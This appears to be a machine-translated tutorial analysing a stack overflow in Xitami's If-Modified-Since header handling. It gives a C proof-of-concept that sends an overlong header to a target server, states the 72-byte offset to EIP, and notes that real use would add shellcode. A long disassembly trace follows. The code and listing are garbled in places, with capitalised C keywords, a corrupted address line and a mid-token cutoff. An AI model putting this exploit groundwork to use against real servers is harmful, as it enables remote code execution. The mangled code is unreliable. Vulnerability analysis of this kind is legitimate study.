Xitami If-Modified-Since command vulnerability analysis and exploitation

Text/figure xyz123
The remote overflow vulnerability has not been written for a long time. This time, we will first write a simple Xitami overflow vulnerability, which is a record of this vulnerability analysis technique and provides you with a simple opportunity to practice.

Vulnerability Overview
Xitami is a third-party free Web service software running on Windows. It provides FTP, HTTP, and other services. The main interface 1 of Xitami Web Server is shown in.
Xitami has a vulnerability in processing the If-Modified-Since command in the HTTP protocol. This is a traditional stack overflow vulnerability. No patch or upgrade version has been released yet.

Vulnerability Analysis
Analyzing vulnerabilities and finding the key assembly code that leads to the vulnerability is the only way to study each vulnerability. First, we test the reproduction vulnerability. All tests in this article are performed on Windows XP SP2 + Xitami 2.5 c2.
Xitami processes the HTTP protocol with xigui32.exe. Open Windbg, select xigui32.exe in "File Attach to a processexe", and run F5 or the "g" command to continue running. The testing code (PoC) published a Perl file on the Internet. I changed it to a C language. The main code is as follows:

WSADATA wsa;
SOCKET client;
Char buf [0x1c0] = {0 };
Char header [0x200] = {0 };
Char nop [0x60] = {0 };
Char host [] = "192.168.1.2"; // server IP Address

WSAStartup (MAKEWORD (2, 2), & wsa );
Client = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP );

Struct sockaddr_in server;
Server. sin_family = AF_INET;
Server. sin_port = htons (80 );
// Default HTTP service port
Server. sin_addr.s_addr = inet_addr (host );
Connect (client, (LPSOCKADDR) & server, sizeof (server ));

Memset (buf, 0x41, 0x100 );
// Fill in all A for testing. The actual usage includes the ShellCode
Sprintf (header, "GET/HTTP/1.1 Host: % sIf-Modified-Since: edevil, % s", host, buf );
Send (client, header, 0x1c0, 0 );
// The header data has a length limit, which will be detailed later.

Compile and execute the code. Windbg is interrupted, as shown in figure 2.

Based on the Testing Method of Character Segmentation filling, we can finally determine that the length before EIP is 72 bytes. You can use the "bp accept" command to break a breakpoint under the accept function and analyze the code to find the cause of the vulnerability as follows.

. Text: 0041AA20 mov eax, [esp + arg_0]
. Text: 0041AA24 mov eax, [eax + 18 h]
. Text: 0041AA27 mov dword_4B0F7C, eax
. Text: 0041AA2C cmp word ptr [eax + 98 h], 0
. Text: 0041AA34 jz short loc_41AA56 // The condition is true.

. Text: 0041AA56 mov edx, [eax + 4Ch] // "A" constructed data
. Text: 0041AA59 push offset s_If-modified-s; "If-Modified-Since"
. Text: 0041AA5E add eax, 14 h
. Text: 0041AA61 push edx
. Text: 0041AA62 push eax
. Text: 0041AA63 call sub_412A80

. Text: 00412A80 push ecx
. Text: 00412A81 push esi
. Text: 00412A82 mov esi, [esp + 8 + arg_0]
. Text: 00412A86 test esi, esi
. Text: 00412A88 jnz short loc_412A9C // The condition is true.

. Text: 00412A9C mov eax, [esp + 8 + arg_4]
. Text: 00412AA0 test eax, eax
. Text: 00412AA2 jnz short loc_412AB6 // The condition is true.

. Text: 00412AB6 mov eax, [esp + 8 + arg_8]
. Text: 00412ABA push eax
. Text: 00412ABB push esi
. Text: 00412ABC call sub_40DAE0
. Text: 00412AC1 mov cl, [eax]
. Text: 00412AC3 add esp, 8
. Text: 00412AC6 test cl, cl
. Text: 00412AC8 jz short loc_412B06
. Text: 00412AC8
. Text: 00412ACA lea ecx, [esp + 8 + var_4]
. Text: 00412ACE lea edx, [esp + 8 + arg_0]
. Text: 00412AD2 push ecx
. Text: 00412AD3 push edx
. Text: 00412AD4 push eax
. Text: 00412AD5 call sub_4444C0
.
. Text: 004444C0 sub esp, 5Ch
. Text: 004444C3 push ebx
. Text: 004444C4 push ebp
. Text: 004444C5 push esi
. Text: 004444C6 push edi
. Text: 004444C7 mov edi, [esp + 6Ch + arg_0]
. Text: 004444CB xor esi, esi
. Text: 004444CD cmp edi, esi
. Text: 004444CF mov [esp + 6Ch + var_5C], esi
. Text: 004444D3 mov [esp + 6Ch + var_58], esi
. Text: 004444D7 mov [esp + 6Ch + var_54], esi
. Text: 004444DB mov [esp + 6Ch + var_50], esi
. Text: 004444DF mov [esp + 6Ch + var_4C], esi
. Text: 004444E3 jnz short loc_4444F7
. Text: 004444E3
. Text: 004444E5 push 124 h
. Text: 004444EA push offset s_CImatixWor_36
; "C: \ iMatix \ Work \ products \ xitami-25 \ sfl \ s "...
. Text: 004444EF call sub_409A50
. Text: 004444EF
. Text: 004444F4 add esp, 8

. Text: 004444F7 mov ebp, [esp + 6Ch + arg_4]
. Text: 004444FB cmp ebp, esi
. Text: 004444FD jnz short loc_444511
. Text: 004444FD
. Text: 004444FF pushing 125 h
. Text: 00444504 push offset s_CImatixWor_36
; "C: \ iMatix \ Work \ products \ xitami-25 \ sfl \ s "...
. Text: 00444509 call sub_409A50
. Text: 0044450E add esp, 8

. Text: 00444511 mov ebx, [esp + 6Ch + arg_8]
. Text: 00444515 cmp ebx, esi
. Text: 00444517 jnz short loc_44452B
. Text: 00444519 push 126 h
. Text: 0044451E push offset s_CImatixWor_36
; "C: \ iMatix \ Work \ products \ xitami-25 \ sfl \ s "...
. Text: 00444523 call sub_409A50
. Text: 00444528 add esp, 8

. Text: 0044452B push 20 h; int
. Text: 0044452D push edi; char *
. Text: 0044452E call _ strchr
. Text: 0044452E
. Text: 00444533 mov edi, eax
. Text: 00444535 add esp, 8
. Text: 00444538 test edi, edi
. Text: 0044453A jnz short loc_444547
. Text: 0044453A
. Text: 0044453C pop edi
. Text: 0044453D pop esi
. Text: 0044453E pop ebp
. Text: 004420.f xor ax, ax
. Text: 00444542 pop ebx
. Text: 00444543 add esp, 5Ch
. Text: 00444546 retn

. Text: 00444547 cmp cchMultiByte, 1
. Text: 0044454E jle short loc_444560
. Text: 0044454E
. Text: 00444550 movsx eax, byte ptr [edi]
. Text: 00444553 push 8; int
. Text: 00444555 push eax; int
. Text: 00444556 call _ isctype
. Text: 00444556
. Text: 0044455B add esp, 8
. Text: 0044455E jmp short loc_44456F
. Text: 0044455E

. Text: 00444560 movsx ecx, byte ptr [edi]
. Text: 00444563 & n